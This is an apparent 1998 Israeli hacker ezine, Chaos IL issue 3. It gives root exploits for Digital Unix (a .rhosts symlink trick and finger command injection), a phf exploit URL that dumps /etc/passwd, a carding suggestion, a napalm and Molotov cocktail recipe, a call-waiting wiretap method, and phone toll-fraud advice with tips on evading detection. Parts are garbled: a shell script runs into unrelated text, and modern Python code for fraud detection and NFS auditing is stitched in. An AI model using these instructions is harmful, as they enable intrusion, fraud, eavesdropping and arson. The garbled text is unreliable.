< The Israeli Underground Information eXchange >

Chaos IL - Issue #3, 13/Apr/1998

Oi! ~If freedom is outlawed, only outlaws will have freedom~ Oi!

Chaos IL Issue Three Index:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

  01. Introduction to Issue #3 (NEWS)                   by morpher
  02. The Trendline Hack - DIGITAL UNIX V4.0            by Captain Black
  03. Hacking the IRIS OS                               by morpher
  04. How to make an improved Incendiary Bottle         by Molotov
  05. Tap into Bezeq's CALL WAITING service             by Terminal Man
 *06. Guide to Bezeq's Extenders and PBXs               by TS / Bezeq
  07. Stuff you didn't know about The Analyzer          by OXiD
  08. Getting around with newbie Hacking                by F0X
  09. Phun quotes from #chaos-il
 *10. Setting your own VMB in Trilog PhoneMail Systems  by morpher
  11. TeleCards resetting                               by OXiD
  12. Resources & Credits                               Chaos-IL

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

*** 01. Introduction to Issue #3

Issue #3 (c) Chaos-IL Foundation 1998

Note from morpher (morpher@netlimit.com):

Welcome to Chaos-IL issue #3! I'm sorry for the delay before this new issue came out... but if you take a brief look at the issue you'll see it was worth the wait :). For the first time we actually have a special guest directly from Bezeq, who gave us an article that answers all the questions that came up lately about Bezeq's PBXs and Extenders.
If you're currently using a PBX or an Extender, or even if you are about to use one, please make sure to read this before beginning so you'll know the risks :P

I've said it once and I'll say it again: if you think you have any kind of interesting, new and original information that you would like to write about, email it to us, and we might include it in the upcoming issue. The fact that someone writes doesn't mean he is a member; he's just another guy who wants to share the information he has in hand.

It has been over a month since our last issue release and there have been some major updates going on. Chaos-IL has become much bigger than we ever expected it to be and it keeps getting bigger; check out our current member list for more info.

Contact info updates:

NEW- You may now leave voice messages to Chaos-IL at morpher's VMB: 177-022-3370 (dont bullshit my brain...bahh)
UPDATE- Our homepage was re-designed and updated, thanks to Fourth Horseman. http://www.liquid98.com/chaos-il/
IRC CHANNEL- Our IRC channel is now public on the EFnet - #chaos-il

morpher.
_____________________________________________________________________________

Chaos-IL primary members:

  morpher           morpher@netlimit.com
  Captain Black     capblack@unixgods.com
  Mr. Freeze        mr_freeze@idc.co.il
  squish
  Dissection        orphaned_land@hotmail.com
  Easy              K_O_C@hotmail.com
  The Trick         trick@mindless.com
  OXiD              transzen@hotmail.com
  skade
  Terminal Man      terman@hotmail.com
  MOONCHiLD         m00nchild@mosad.org
  malder            sharky@hotmail.com
  Molotov           molotov@hotmail.com
  Jekyll            wwsuicide@hotmail.com
  The Errormaker
  Fourth Horseman   4thm@liquid98.com

Members can be reached via eMail (also see the bottom of each article).
Applications, feedback, corrections and support go to: morpher@netlimit.com

How to retrieve Chaos IL
~~~~~~~~~~~~~~~~~~~~~~~~
Chaos IL issues will be regularly available once released on these fine boards:

  Liquid Underground   +972 (0)3-9067029
  Kaos On Compton      +972 (0)8-8524603
  The Orphaned Land    +972 (0)8-9422043

Chaos IL is also regularly available on the following anonymous sites:

  ftp.fc.net           /pub/phrack/underground/chaos-il/
  ftp.auscert.org.au   /pub/emags/chaos_il/

* Israeli sites will also be available soon.

You can also:
-Join our IRC channel at EFnet: #chaos-il
-Look out on the Web at: http://www.liquid98.com/chaos-il/

*** 02. The Trendline Hack - DIGITAL UNIX V4.0

$ THE TRENDLINE HACK $
by Captain Black
(c) Chaos-IL Foundation 1998

Trendline Hack Introduction
---------------------------
Trendline is an old Internet Service Provider company in the Internet field in Israel. Unlike some of the other ISPs in Israel, Trendline is a hacker-friendly ISP. Trendline gives us almost everything possible to:

-Hack them (Root them)
-Fraud their accounts billing
-Flood them (simply)
-Hack their webpage
-Abuse their IRC users

Of all those, I'll be dealing with one thing right now: hacking them, or in other words, gaining root on their system. Trendline's router runs on the Digital Unix 4.0 operating system, which is known as a hell of a holed system (pretty stupid to run a router on it). In this article I give examples of and describe all the operations and high-level techniques you may use to gain root on their system; though it's a regular DG/UX 4.0 like the others, Trendline's system has a few holes that are specific to their host.

--

In order to try/execute all of the techniques below, you must have a Trendline account. Trendline accounts are easy to get on the public, or you can card yourself one with a valid full-detailed credit card info.
(you might want to take a look at the PPA accounts carding article in Chaos-IL #2)

Trendline support number: 03-6388222 (use this to card)

After you are equipped with an account, access their UNIX system through the main host at trendline.co.il, or if you are familiar with X.28 / X.25 routers you may make your work easier and access them through the escape key ('^]') after you have entered the username (no password) for ppp mode.

/\NOTE/\ I'm writing this article assuming you are basically familiar with UNIX, so I won't start detailing every little command and technical step. And YES, I did hack Trendline with one of the techniques listed below.

***************************************************************************

Local techniques
----------------
The first thing to try is the IFS hole in /usr/sbin/dop. If dop is setuid root, there is a good chance that you can gain root this way. Here is a shell script :

----------------------------------------------------------------------------
#!/bin/sh
cat > /tmp/usr <ls -la
(Blah Blah Blah.....)
-rw-rw-rw- 1 root system 0 Nov xx 15:49 fstab.advfsd.lockfile

What the hell to do with it:
Before it creates
ln -s /.rhosts /tmp/fstab.advfsd.lockfile
from here...
cat "+ +" > /tmp/fstab.advfsd.lockfile , etc etc.

The End - El Fin
Colombia 1997.
Efrain 'ET' Torres
----------------------------------------------------------------------------

This is for Digital Unix 3.x (I've never seen it work.)

$ ls -l /usr/tcb/bin/dxchpwd
-rwsr-xr-x 1 root bin 49152 Jul 25 1995 /usr/tcb/bin/dxchpwd
$ ls -l /tmp/dxchpwd.log
/tmp/dxchpwd.log not found
$ export DISPLAY=:0 (or a remotehost)
$ ln -s /hackfile /tmp/dxchpwd
$ ls -l /hackfile
/hackfile not found
$ /usr/tcb/bin/dxchpwd
(The dxchpwd window will appear. Just enter root for username and anything for the passwd. You'll get a permission denied message and the window will close.)
$ ls -l /hackfile
-rw------- 1 root system 0 Nov 16 22:44 /hackfile
----------------------------------------------------------------------------

Remote techniques
-----------------
I don't have too much here except one pretty big hole. Digital Unix 4.x is blind ip spoofable!!! So, if you can guess or determine a trust relationship, the machine is yours. Also, when the CERT statd advisory came out, Digital released a patch. I haven't played around with that, but it might be worth looking into.

Also, Digital Unix 4.0 sometimes has an 0wned finger daemon, try this..

% finger �/bin/w@host

If this gives uptime info etc, it shows the system is vulnerable to this attack, you can specify any command.. simple to use.

Captain Black.
____________________________________________________________________________

*** 03. Hacking the IRIS OS

/---/---/---/---/---/---/---/---/---/---/---/
             Hacking the IRIS/OS
/---/---/---/---/---/---/---/---/---/---/---/
by morpher
Chaos IL

IRIS R9.1.3A

Introduction

Hello Everybody,

Here is some info on a relatively old system called IRIS, or Interactive Realtime Information Service. This system was originally meant to run on older systems like PDP-8 and PDP-11. Due to the versatile nature of IRIS, today a lot more systems run it.

IRIS systems usually can be reached at 1200 7E1 and after pressing either ESCape or Enter a few times, you should see something like this as a greeting:

-=-
Welcome to "IRIS" R9.1.3A timesharing !
ACCOUNT ID ?
-=-

Or sometimes it will say what you have reached under the welcome line. IRIS is also extremely hacker-friendly as it will let you type account names for as long as you want. Also, when you guess an account there are no passwords on them. At first you will not see what you type; to change this type Control-E to turn the echo on. Try CAPSLOCK also.
-=-
DEFAULT ACCOUNTS
----------------
MANAGER    (Good System Access)
NO NAME    (Normal User)
DEMO       (Try the other ones first)
PDP8       /
PDP11     <  == All General Accounts
SOFTWARE   \

Hopefully you're in there with one of those accounts. Then you will get a # prompt. If you are on with an account of access level 3, then you will be able to use a user maintenance program, by typing either ACCOUNTS or ACCOUNT UTILITY. You should get:

-=-
(0) EXIT TO SYSTEM
(1) ADD NEW ACCOUNT
(2) MODIFY ACCOUNT
(3) DELETE ACCOUNT
(4) INQUIRE ACCOUNT
(5) LIST THE ACCOUNTS

Ah, I wasn't able to create an account, but I did modify several. Basically this is pretty straightforward.
-=-

Ok, after you're done playing with the accounts and have exited properly, there are a lot of interesting features on this IRIS. On one particular system that I use often you have several utilities such as spreadsheets, word processors and even an ASM program. You can get a list of all the things to do by typing LIBR at the # prompt. For most of the filenames you type the response will be "NOT A PROCESSOR", since most of the IRIS software was written in Business BASIC. Type BASIC LOAD .

Here are some of the most interesting programs. PP or PORT ALL MONITOR will let you see who else is using the system. If for some reason you want to kick off a user, type PPP and then the user name. Also, if you want to see your own status type PROT.STAT

If you need help with something try typing GUIDE and it will give you a short menu of all the help files available. Too bad there usually aren't many.

Another interesting utility to use is BLOCKCOPY; since I am not completely used to it, I will show you what the guide said:

INTERACTIVE PROGRAM GUIDES FOR IRIS CONFIGURATION AND SETUP

TOPIC #   FOR INFORMATION ON:
   1      BLOCKCOPY

THESE PROGRAMS CAUSE NO ACTUAL CHANGES TO TAKE PLACE. RATHER THEY DESCRIBE THE ACTUAL PROCESSORS/COMMANDS YOU SHOULD USE TO MAKE THE CHANGES YOU DESIRE.
'BEFORE' YOU ACTUALLY DO MAKE THE SUGGESTED CHANGES, YOU SHOULD FIRST 'BACKUP YOUR SYSTEM'. REMEMBER TO BE VERY CAREFUL WHEN WORKING WITH THE DSP PROCESSOR.

ENTER TOPIC # 1

INTRODUCTORY COMMENTS ON USING BLOCKCOPY
PRINT HERE OR $LPT (C/R OR $) :

INTERACTIVE PROGRAM GUIDE ON SETTING UP BLOCKCOPY

INTRODUCTION

BLOCKCOPY IS A STAND-ALONE UTILITY PROGRAM WHICH GIVES GREAT FLEXIBILITY IN COPYING ANY PART OF ONE DISC TO ANY PART OF ANOTHER, EVEN ONTO A DIFFERENT DISC CONTROLLER. BLOCKCOPY DOES NOT PROVIDE FAST PERFORMANCE, BUT IT CAN BE VERY USEFUL IN SPECIAL CASES.

EXAMPLES:

1) YOU CAN COPY A SINGLE LOGICAL UNIT FROM ONE PACK TO ANOTHER, WITHOUT OVERWRITING OTHER LOGICAL UNITS ALREADY ON THE DESTINATION.
2) IF YOU HAVE BOTH LARGE STORAGE MODULES AND SMALLER CARTRIDGE DRIVES ON THE SAME SYSTEM, YOU CAN BACKUP YOUR SYSTEM LOGICAL UNIT 0 FROM STORAGE MODULE ONTO A CARTRIDGE PACK WHICH CAN BE SET ASIDE AS A DEDICATED SYSTEM BACKUP.
3) IF YOU HAVE A SPECIAL SWAPPING DISC, IT CAN BE BACKED UP TO AND RESTORED FROM OTHER STORAGE MODULES.

PRESS RETURN WHEN READY TO GO ON

LIMITATIONS

NOTE THAT WHILE YOU CAN COPY FROM ONE TYPE OF DISC CONTROLLER TO ANOTHER, THE RESULT MAY NOT BE INSTALLABLE UNDER IRIS BECAUSE OF SOME DISC ADDRESS CONSIDERATIONS. ALSO NOTE THAT YOU MAY NOT SPECIFY A DESTINATION WHICH PHYSICALLY OVERLAPS THE SOURCE ON THE SAME PACK.

SETUP

FIRST, HAVE AT HAND YOUR R9.0 PERIPHERALS HANDBOOK. NOTICE THAT FOR EACH TYPE OF DISC, THERE IS A DIFFERENT VALUE FOR THE BZUD POINTER. ALSO NOTICE THAT IT GIVES YOU FORMULAS TO COMPUTE VALUES CALLED PHYU. FIND THE APPROPRIATE DISC SPECIFICATION SHEET(S) DESCRIBING YOUR SOURCE (WHERE YOU ARE COPYING BLOCKS FROM) AND YOUR DESTINATION (WHERE YOU ARE COPYING BLOCKS TO). THE SOURCE AND DESTINATION DO NOT HAVE TO BE THE SAME TYPE OF CONTROLLER.

PRESS RETURN WHEN READY TO GO ON

NOTE: ALL REQUESTED VALUES/CALCS IN OCTAL UNLESS OTHERWISE NOTED. ALL VALUES ON DISC SPECIFICATION SHEETS ARE IN OCTAL.
ENTER THE FOLLOWING VALUES FOR THE SOURCE:

ADDRESS OF THE SOURCE BZUD : 0
COMPUTED VALUE OF SOURCE PHYU : 0
STARTING CYLINDER NUMBER : 0
BLOCK # IN THE CYL TO START COPYING FROM (ORIGIN 0) THIS IS NORMALY ZERO : 0
SOURCE CONTROLLER'S DEVICE CODE : 0
SOURCE DISC'S LRC : 0
NUMBER OF CYLINDERS TO COPY (REM TO GIVE IN OCTAL) : 0

ENTER THE FOLLOWING VALUES FOR THE DESTINATION:

ADDRESS OF THE DESTINATION BZUD : 0
COMPUTED VALUE OF DESTINATION PHYU : 0
STARTING CYLINDER : 0
BLOCK # IN THE CYL TO START COPYING TO (ORIGIN 0) : 0
DESTINATION CONTROLLER'S DEVICE CODE : 0

PRINT HERE OR $LPT (C/R OR $) : 0

RUN "MAKEBLOCKCOPY", WHEN FINISHED ENTER THE FOLLOWING COMMAND:

#SHUTDOWN [PASSWORD] BLOCKCOPY @73000,X73000

USE DBUG TO SET UP THE FOLLOWING LOCATIONS:

200 : 0
201 : 0
202 : 0
203 : 0
204 : 0
205 : 0
206 : 0
207 : 0
210 : 0
211 : 0
212 : 0
213 : 176346

PRESS RETURN WHEN READY TO GO ON 0

THEN J410 (OR RESET & START AT 410) TO START THE COPY

RULES FOR BLOCKCOPY:

ADDRESS   FUNCTION
  400     BAD HALT
  401     NOT USED
  402     NOT USED
  410     START COPY
  411     START VERIFY
  412     START DISC PATTERN GENERATOR
  413     START DISC PATTERN VERIFICATION
  414     RETRY CURRENT BLOCK/IF SUCCESSFUL, RESUME-NO LOSS
  415     SKIP CURRENT BLOCK/GO TO NEXT BLOCK - BLOCK LOST
  416     START INFINITE DISC PATTERN TEST

PRESS CR TO CONTINUE DISPLAY OF RULES

HALTS:

  63077   INDICATES A SUCCESSFUL COMPLETION
  63377   WRONG VALUE(S) IN TABLE STARTING AT 200
  67077   READ ERROR
  73077   WRITE ERROR
  63277   VERIFY ERROR IN CORE COMPARE

ON READ OR WRITE ERROR, CHECK THE FOLLOWING CELLS:

  260 = CURRENT SOURCE RDA
  261 = CURRENT DEST RDA
  262 = CURRENT DISC STATUS

NO AUTOMATIC RETRIES ARE DONE. ON A BAD BLOCK, THERE ARE OPTIONAL RESTARTS AT LOC 414 & 415 (SEE ABOVE)

INTERACTIVE PROGRAM GUIDES FOR IRIS CONFIGURATION AND SETUP

TOPIC #   FOR INFORMATION ON:
   1      BLOCKCOPY

THESE PROGRAMS CAUSE NO ACTUAL CHANGES TO TAKE PLACE. RATHER THEY DESCRIBE THE ACTUAL PROCESSORS/COMMANDS YOU SHOULD USE TO MAKE THE CHANGES YOU DESIRE.
'BEFORE' YOU ACTUALLY DO MAKE THE SUGGESTED CHANGES, YOU SHOULD FIRST 'BACKUP YOUR SYSTEM'. REMEMBER TO BE VERY CAREFUL WHEN WORKING WITH THE DSP PROCESSOR. -=- Also you can edit individual text files and configuration files by text editors. The names of this shit is different on all the systems I've called. -=- CONCULSION I hope this serves a useful purpose.. I still can't understand why IRIS is extremely easy to use, and very common.. yet, I haven't seen any good articles on it in the previous issues of chaos-il. morpher. ================================================================================ 04. How to make an improved Incendary Bottle Chaos-il's NEW Anarchy Division ******************************* Article #1 How to make an improved Incendary Bottle ________________ (aka, Molotov Cocktail) ___________ By: Molotov Incendary Bottles, popularly known as Molotov Cocktails are used to start fires in buildings or as weapons against vehicles or troops. A Molotov Cocktail is nothing more than a glass bottle or jar which has been filled with gasoline and plugged with a gas-soaked rag in the end. When the rag is lit and the bottle is thrown, the gasoline is ignited and spreads a sheet of flame. More effective Molotov Cocktails can be made by using homemade napalm instead of gasoline. For those of you who don't know, napalm is simply gelled gasoline which burns hotter than regular gasolne and clings to whatever it splatters on! Now, on with the napalm... Napalm can be made in several easy ways. The easiest method is to mix 36 parts by volume of gasoline with 1 part of 100-proof alcohol (whiskey or vodka) and 25 parts soap flakes. Only real soap such as Ivory or Palmolive soap bars can be used. Detergent will NOT work. Put the gasoline in a bucket or other container and add the alcohol. Stir the soap flakes in slowly until the gasoline sets in a thick gel. After standing for a few days, the mixture will have the consistency of butter. 
If necessary, it can be thinned by adding more gasoline. Gasoline can also be gelled with egg whites and any of the following additives: instant coffee, sugar, Epsom salts, baking soda, or salt. To make napalm, place the gasoline in a bucket and add 1 part of egg whites to every 6 parts of gasoline. Slowly add the coffee, sugar or some other suitable material until the gasoline gels to the consistency of jam. This version of napalm breaks down quickly and should be used within 24 hours. Have fun! 05. Tap Bezeq's CALL WAITING service +++++++++++++++++++++++++++++++++++++++++++++++++++ + + + Tap Bezeq's CALL WAIT service + + + +++++++++++++++++++++++++++++++++++++++++++++++++++ + by Terminal Man + +++++++++++++++++++++++++++++++++++++++++++++ ++ Chaos IL ++ So, you have an enemy who talks behind your back, eh? Or, maybe you just would like to "listen" in on your friend's conversations? Well, if you have 2 phone lines and call waiting on one of them, you are in luck. (Only one problem: your friend must also have call waiting!) Procedure: [1] Call up your friend with the phone you want to listen with. When he answers call waiting (he's already on the phone, and you are the 2nd caller), then you either sit there or say: sorry, I have the wrong #. [2] Next, you wait until he goes back to the other line (puts you on hold). [3] Then, pick up your other line and call ->YOUR<- call waiting. [4] Answer call waiting [5] Then go back to him. (Answer, and then click back.. Click ->2<- times answer, and go back..) [6] Hang up your second line [7] You are now on the line! [8] Listen and be Q U I E T ! He can hear you! Techniques I use to prevent noise or confusion: If you have call forwarding, turn it on and forward calls somewhere before you start listening. If a call comes through on your call waiting circuit, the people talking (your buddie and his pal) will not hear anything, but after you answer call waiting and come back, they will hear the other call hang up (two clicks). 
If you don't have call forwarding, I suggest you get it if you are going to make a habit of this, because it will become a major pain in the ass. When your call waiting rings, you are removed from the "listening" conversation and placed back on his hold circuit. In order to get back on, you must answer the phone and wait for your party when you answer the phone, tell the guy you are in a hurry and you have to go or you'll call him back later or something) to hang up. When he or she hangs up, you will be back on the conversation. Then, one of your pals will say: What was that? (because of the clicks).. So, try to use call forwarding if you can. Remember: Have fun, and don't abuse it. I am not sure about it, because I just discovered it. It is illegal (what isn't these days) because it is invading privacy". I don't know if Bezeq opers just did not realize there was a flaw in it, or that was planned for line testing, I am not sure. Have phun... Terminal Man. _____________________________________________________________________________ 06. Guide to Bezeq's Extenders and PBXs Guide to Extenders and PBXs By: TS (1996 - '98 Bezeq 199 oper) Disclaimer: Don't blame any Chaos-IL members :-) I will probably use a few abbrevations in this, so its would be good to know them. Here they are: PBX: Private Branch eXchange ANI: Automatic Number Identification LD: Long Distance ACN: Area Code and Number IES: Internal Extension System SCC: Specialized Common Carrier ESS: Electronic Switching System CAMA: Centralized Automated Message Acounting A PBX and a extender are not the same thing. They are used as the same word because you can use them to accomplish the same goal: making a free ld or local call. First, I will talk about PBXs in general, and Bezeq's PBXs. A PBX is a baically a few telephone numbers owned by a company. PBXs are present when a company has a IES. 
An IES is a system in which a person at his desk can dial three numbers to reach another person's desk in the same office. If the person wants to dial outside of their office or building, they must dial 9 then the ACN. I have also seen * and # instead of 9.

Some PBXs have dial-up lines so the people can work from home. This way, the employees don't have to pay for their business calls. The company gives each employee a certain authorization code, so they can call the dialup of the PBX, enter their authorization code, and press 9 (or *,#), then the ACN, and their company pays for the call. You can tell if you've found a PBX if there is a different ringback. I suppose you'll know if you found one. You can get them by randomly dialing numbers (e.g: make a 177 number scan), or use your social engineering skills.

An extender is a service set up by a telephone company. Basically, an extender has the same function as a phone card. You dial the phone number the phone company gives you, enter your authorization code, and then dial the ACN (no 1). Extenders can be found in the 177 NPA or in the 1-800 range. 1-800 numbers are free from your house, but not from a pay phone.

There are a few possible ways to find extenders. You could call the phone company and say you forgot the phone number where you can enter your authorization code. Another way is randomly dialing numbers. I would use 177 numbers first.

Ways of knowing you found an extender:

1. Get a dialtone after dialing the number.
2. Short beep then silence.
3. Constant tone that stops when you dial something.
4. If you are asked for the code and phone number (kind of obvious)

So if you find one of those, then you MAY have found an extender. Number three is most likely an extender. I've never really seen any that aren't.

Once you have found an extender, you must find out how many digits are in the code, and if it wants the code or ACN first. That's the hard part, I guess you should just play around with it. Listen for tones.
Most extenders are 177 numbers, and most 177 numbers are equipped with the ability to trace. Most extenders and PBXs have ANI, which means they know your phone number when you call. PBXs can sometimes be found in local areas. Extenders can normally call anywhere in the US and Canada. All the PBXs I work with can call basically anywhere. 1-800 extenders have a nice clear connection, nice for data transfers.

I must now explain something about Bezeq, so I can tell you how to secure and not get caught. ESS has the ability to trace calls. ANI is what enables ESS to trace. ESS also has a tape which records information about phone calls. This is called CAMA. It records the number of the caller and receiver, the time of the call, if the receiver answered the phone, and what time the caller hangs up. The tape is used for billing purposes. Normally, 177 numbers and local calls are ignored when it is sent for billing. The billing machines are quite sensitive though.

Here is a list of what extenders can detect (from my knowledge, I wouldn't be surprised if this list could be doubled.)

1. Sequential dialing (if you use this, you're saying "Bezeq! caught me!" :))
2. Number of calls coming from a phone number (try to scan during the day, because who would make 400 calls at 3:00 a.m.?)
3. Time between calls. (like 5 calls in a minute, or if there is a code failure every couple of minutes.)
4. Time it takes to dial a number. (not many people can dial a phone number in 50 milliseconds.)
5. Amount of time between each number. (not many people can have exactly 1 millisecond between the 8 the 0 and the 0.)
6. (I hear rumors that they have a list of Bezeqnet and Internet-zahav numbers, so don't call Bezeqnet and Inet-zahav all the time, makes sense to be true).

Basically, what I'm getting at is to use randomization. I would recommend dialing everything by hand, but that would take too long, so find yourself a good code hacker that has randomization.
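The five timing and volume signals in the list above, seen from the operator's side. This is an added example, not code from the article or from Bezeq: the record layout, the thresholds and the sample call records are all constructed assumptions.

```python
from collections import defaultdict
from dataclasses import dataclass
from statistics import pstdev


@dataclass(frozen=True)
class Attempt:
    ani: str          # calling number delivered by ANI
    start: float      # arrival time, seconds since midnight
    code: str         # authorization code keyed by the caller
    digit_ms: tuple   # offset of each keyed digit from the first, in ms
    accepted: bool    # True if the code was valid


# Thresholds are constructed for this example, not operator values.
SEQ_RUN = 3            # consecutive codes that each increase by one
BURST_CALLS = 5        # calls inside BURST_WINDOW seconds
BURST_WINDOW = 60.0
MAX_FAILED = 5         # rejected codes from one calling number
MIN_DIAL_MS = 500      # a person needs longer than this to key a code
MIN_JITTER_MS = 5.0    # spread of inter-digit gaps below this is machine-like


def longest_sequential_run(codes):
    """Length of the longest run where each code is the previous one plus 1."""
    if not codes:
        return 0
    best = run = 1
    for prev, cur in zip(codes, codes[1:]):
        stepped = prev.isdigit() and cur.isdigit() and int(cur) == int(prev) + 1
        run = run + 1 if stepped else 1
        best = max(best, run)
    return best


def max_calls_in_window(starts, window):
    """Largest number of calls that fall inside any window of that length."""
    best = lo = 0
    for hi, t in enumerate(starts):
        while t - starts[lo] > window:
            lo += 1
        best = max(best, hi - lo + 1)
    return best


def machine_keyed(digit_ms):
    """Return (too_fast, too_regular) for one attempt's digit timing."""
    gaps = [b - a for a, b in zip(digit_ms, digit_ms[1:])]
    too_fast = len(digit_ms) > 1 and digit_ms[-1] - digit_ms[0] < MIN_DIAL_MS
    too_regular = len(gaps) >= 2 and pstdev(gaps) < MIN_JITTER_MS
    return too_fast, too_regular


def score_callers(attempts):
    """Map each calling number to the sorted list of signals it trips."""
    by_ani = defaultdict(list)
    for a in attempts:
        by_ani[a.ani].append(a)
    report = {}
    for ani, calls in by_ani.items():
        calls.sort(key=lambda a: a.start)
        flags = set()
        if longest_sequential_run([c.code for c in calls]) >= SEQ_RUN:
            flags.add("sequential")
        if max_calls_in_window([c.start for c in calls], BURST_WINDOW) >= BURST_CALLS:
            flags.add("burst")
        if sum(not c.accepted for c in calls) >= MAX_FAILED:
            flags.add("failed_codes")
        timing = [machine_keyed(c.digit_ms) for c in calls]
        if any(fast for fast, _ in timing):
            flags.add("fast_dial")
        if any(regular for _, regular in timing):
            flags.add("uniform_gaps")
        report[ani] = sorted(flags)
    return report


# Constructed call records: one automated scanner, one person mistyping once.
SAMPLE = [
    Attempt("03-5550100", 10800 + 8 * i, str(4410 + i), (0, 1, 2, 3), False)
    for i in range(6)
] + [
    Attempt("03-5550199", 36000, "7312", (0, 410, 950, 1320), False),
    Attempt("03-5550199", 36240, "7321", (0, 380, 700, 1190), True),
]

if __name__ == "__main__":
    for ani, flags in score_callers(SAMPLE).items():
        print(ani, flags or "no signals")
```

Each signal is cheap on its own; an operator would normally act on several tripping together for one calling number rather than on any single one.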
I don't really use code hackers, so I don't know of any. Also, if you happen to find some codes, don't go crazy. If you get caught, you probably won't go to court or anything like that. Bezeq will probably just send you a bill. Some people say to distribute your authorization codes so that Bezeq can't bill all the people using their extenders or PBXs. In a case like this, they would probably bill the persons who used it most or they'll just prolly close the extender.

[EOF]

I cannot give away my email address or any other personal contact info. You may contact me through the Chaos-IL VMB at # 177-022-3370 (please sign your message to "TS")
_____________________________________________________________________________

07. Stuff you didn't know about The Analyzer

###################################
  Stuff you didn't know about...
       ** The Analyzer **
###################################
by OXiD
(c) Chaos-IL Foundation 1998

The Analyzer, as most know, is one of the greatest computer hackers in the world; he hacked so many boxes but only harmed Nazi and kids porn sites. The Analyzer has already hacked heavily secured servers around the globe, The Pentagon being one of them (not many know, but the USA missile center was hacked by the Analyzer by mistake; he didn't know he was hacking a missile center box, he was sure he was hacking another .gov box).

The Analyzer has been hacking since he was 13 years old, when he started his own hacking programs, which he's been using until today, with improvements of course. The Analyzer began by hacking boards, and was working with the sysop of the legendary Aquarious BBS. Since then he's hacked quite a few shells, not only to see if he can face the challenge like he's usually done but to get back at Nazis and at other people who got into a fight with him. He's gained ircop privileges a couple of times during fights in Nazi channels, and even after he told the box administrators about the holes he continued controlling their systems.
The Analyzer was caught after FBI agents had already captured the wrong people a couple of times, like a poor surfer in Hawaii, 2 guys from the US whom the Analyzer had taught his tricks, and a couple of the Analyzer's friends; after those busts he published his name on the Internet in order to save his friends. The Analyzer wasn't allowed to leave his house for 10 days, and obviously not to touch a computer, since his was taken away by the police. Right now, as you're reading this, the Analyzer awaits his sentence, which will probably be a fine.

OXiD
Chaos-IL
_____________________________________________________________________________

08. Getting around with newbie Hacking

Getting around with newbie Hacking
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by F0x

In the following text I will give you a step-by-step guide on how to get started with hacking, and a little FAQ..

FAQ:

can some1 hack into my Windows95?
no! unless yer using Explorer 3.00 which has a bug which was fixed....in any version available currently. i don't think any1 will have ie 3.00...

how can i hack irc???
there is no such thing as HACKING IRC! if you ask that question you will get kicked from any normal hacking channel.

what can i hack then?
computers which are meant for mass use (use by more than one person)... if you are smart enough to hack you will understand y...

Now let's begin. To be a little more specific, the easiest system to hack is unix, because its main purpose is to serve more than one user at the same time, and we know lots of bugs for it.. if you wanna learn unix hacking i can give you a detailed process:

1. Hate Microsoft & Windows 95 in particular
2. Get Linux
3. Install Linux (don't ask some1 to install it for ya.. if you can't install it yerself, using non-direct help, don't even start hacking)
4. Maintain Your Linux / Make Linux yer primary OS
**********You're almost there***********
5. Get Exploits ( to get good ones is the hard part! )

What is a passwd file? and what can you learn from it?

A passwd file is a file called passwd, and its full path on any unix system is /etc/passwd. A passwd file contains all the users and their passwords in a one-way encrypted format. Its full format is

user:encrypted-pass:userid:usergroupid:full-name:/home/path:/bin/shell

-- I will use this info l8r.

PHF
---
Phf is a program meant to test other programs and return their stats and environmental variables. However, it can be manipulated, and all you need is just to give this a thought: it tests ==> it runs the programs ==> you can run any program, even cat /etc/passwd (the cat command is like "type" in dos) ==> you can get the user list and their encrypted passwords.

Why is this useful? Because phf runs from the web server and this should be its full path:

http://www.notmaintained.edu/cgi-bin/phf

so this means we can execute that command remotely. Now all we need to know is how to crack those encrypted passwords and we're done. This is why we have passwd crackers such as "John The Ripper" or "Cracker Jack" which are the best (i prefer john, you can net search for these programs anywhere). Anyhow, using phf isn't tough, you can use my phfcommand.c or phfscan.c available at .

Now i will show the exploit line:

www.trying.edu/cgi-bin/phf?Qalias=x%0acat%20/etc/passwd

and that's it. (Put this line in any browser; of course lynx is preferred - and guess y?... because it has nothing to do with microsoft.)

For the advanced..........

MOUNT
^^^^^
Apparently not every1 knows what this means... in order to use this bug you need to at least own or 0wn one unix box (0wn = own by haxing) <== you already have root. What you need to do is showmount -e host , this may sometimes give u a list of directories, some may be users' directories, so all you have to do is mount.
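For an administrator, the same showmount -e listing is the thing to audit. The following is an added example, not code from the article: it flags exports that any host may mount and checks home directories for wildcard .rhosts entries such as the "+ +" line that appears in this issue. The sample listing, host names and the spellings accepted for a world export are constructed assumptions.

```python
from pathlib import Path

# Client fields that mean "any host". Assumption: showmount implementations
# differ in how they print a world export, so several spellings are accepted.
WORLD_CLIENTS = {"(everyone)", "everyone", "*"}
# Assumption: path components that usually hold user home directories.
HOME_COMPONENTS = {"home", "users"}


def open_exports(showmount_text):
    """Return [(path, kind)] for exports that any host may mount.

    kind is "home" when the path looks like a home-directory tree, which is
    the case where a remote client can plant files in a user's account.
    """
    findings = []
    for raw in showmount_text.splitlines():
        line = raw.strip()
        if not line.startswith("/"):
            continue  # "Export list for ..." header or blank line
        fields = line.split(None, 1)
        path = fields[0]
        clients = []
        if len(fields) > 1:
            clients = [c.strip().lower() for c in fields[1].split(",")]
        if not clients or any(c in WORLD_CLIENTS for c in clients):
            kind = "home" if HOME_COMPONENTS & set(Path(path).parts) else "other"
            findings.append((path, kind))
    return findings


def wildcard_rhosts_entries(text):
    """Return .rhosts lines that trust any host or any user ("+" wildcard)."""
    bad = []
    for raw in text.splitlines():
        fields = raw.split()
        if not fields:
            continue
        host = fields[0]
        user = fields[1] if len(fields) > 1 else ""
        if host == "+" or user == "+":
            bad.append(" ".join(fields))
    return bad


def scan_home_tree(root):
    """Map each <root>/<user>/.rhosts with a problem to its offending lines."""
    results = {}
    for rhosts in sorted(Path(root).glob("*/.rhosts")):
        if rhosts.is_symlink() or not rhosts.is_file():
            # A .rhosts that is a link or special file deserves a manual look.
            results[str(rhosts)] = ["<not a regular file>"]
            continue
        bad = wildcard_rhosts_entries(rhosts.read_text(errors="replace"))
        if bad:
            results[str(rhosts)] = bad
    return results


# Constructed listing in the general shape of `showmount -e` output.
SAMPLE_SHOWMOUNT = """\
Export list for fileserver.example.edu:
/export/home (everyone)
/usr/local   192.0.2.10,192.0.2.11
/pub         *
/var/mail    *.example.edu
"""

if __name__ == "__main__":
    for path, kind in open_exports(SAMPLE_SHOWMOUNT):
        print(f"world-mountable export: {path} ({kind})")
```

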